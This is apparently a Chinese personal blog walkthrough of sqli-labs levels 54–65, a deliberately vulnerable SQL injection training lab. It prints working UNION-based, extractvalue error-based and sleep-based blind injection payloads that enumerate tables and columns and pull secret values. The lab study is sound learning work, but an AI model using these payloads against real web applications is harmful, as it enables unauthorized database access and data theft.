sqli-labs54-65

sql-page4
靶场
发布日期:   2021-04-28
文章字数:   631
阅读时长:   2 分

sqli-labs通关(54-65)

已知数据库名为challenges,且限制了尝试次数,次数过后会随机生成一个新的表名和密码

Less-54GET - challenge - Union- 10 queries allowed - Variation 1

单引号报错,–+注释后正常,说明单引号闭合

order by 到4报错,说明有3列

基于错误的联合注入

爆库:额 。。已知库名为challenges

?id=-1' union select 1,2,database() --+

爆表:7poqzjt6p4

?id=-1' union select 1,2,group_concat(table_name) from information_schema.tables where table_schema='challenges' --+

image-20210428202129314

爆列:secret_9U56

?id=-1' union select 1,2,group_concat(column_name) from information_schema.columns where table_name='7poqzjt6p4' --+

image-20210428202216222

爆secret:AtM2570eOgEDCWvQXPfUsZUi

?id=-1' union select 1,2,(select secret_9U56 from challenges.7poqzjt6p4) --+

image-20210428202447114

提交后成功

Less-55GET - challenge - Union- 14 queries allowed - Variation 2

尝试发现闭合符为),–+注释

基于错误的联合注入

爆表:r78tfrwxvr

?id=-1) union select 1,2,group_concat(table_name) from information_schema.tables where table_schema='challenges'--+

爆列:secret_ZQ5P

?id=-1) union select 1,2,group_concat(column_name) from information_schema.columns where table_name='r78tfrwxvr'--+

爆secret:uz7XgCo3x4Z5SCycckVQk6d3

?id=-1) union select 1,2,secret_ZQ5P from challenges.r78tfrwxvr--+

提交后成功image-20210428203356295

Less-56GET - challenge - Union- 14 queries allowed -variation 3

发现闭合符为’),–+注释

image-20210428203547943

操作同上关

Less-57GET - challenge - Union- 14 queries allowed - Variation 4

尝试后发现闭合符为”,–+注释

image-20210428203655191

其余操作同上

Less-58GET - challenge - Double Query- 5 queries allowed - Variation 1

只有5次机会

?id=1’报错,我们进行报错注入

image-20210428203930529

报表:t2karweg5y

?id=-1' and extractvalue(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema='challenges')))--+

image-20210428204452902

爆列:secret_WRS2

?id=-1' and extractvalue(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_name='t2karweg5y')))--+

image-20210428204608994

爆值:IgyoUCcyW5MeuqyrhCKZ2Tjb

?id=-1' and extractvalue(1,concat(0x7e,(select secret_WRS2 from challenges.t2karweg5y)))--+

image-20210428204719447

Less-59GET - challenge - Double Query- 5 queries allowed - Variation 2

五次机会

输入?id=1’报错

image-20210428205000984

数字型注入

payload中id=-1即可

其余操作同58关

Less-60GET - challenge - Double Query- 5 queries allowed - Variation 3

5次机会

尝试后发现为“)闭合,–+注释

image-20210428205204198

其余不再赘述,基于错误联合注入即可

Less-61GET - challenge - Double Query- 5 queries allowed - Variation 4

尝试后发现闭合符为’)),–+注释

image-20210428205350898

其余不再赘述,基于错误联合注入即可

Less-62GET - challenge - Blind - 130 queries allowed - variation 1

130次尝试机会。。。

闭合符为‘),–+注释

image-20210428205556067

发现union查询后不回显了,关闭了报错

测试时间延迟型:

?id=1') and sleep(5) --+

存在明显延迟

盲注太烦了,就不写了,猜到啥时候了,果然130次没安好心

Less-63GET - challenge - Blind - 130 queries allowed -Variation 2

发现闭合符为’,–+注释

同上关也得时间延迟型盲注

Less-64GET - challenge - Blind - 130 queries allowed - variation 3

发现闭合符为)),–+注释

image-20210428210158369

同上,时间延迟型盲注

Less-65GET - challenge - Blind - 130 queries allowed - Variation 4

闭合符为”),–+注释

image-20210428210311397

同上时间延迟型盲注

文章作者: 晓莎K
文章链接: http://0x00xiaoshaK.github.io/2021/04/28/sqli-labs54-65/
版权声明: 本博客所有文章除特別声明外,均采用 CC BY 4.0 许可协议。转载请注明来源 晓莎K !
sql-page4
评论
  目录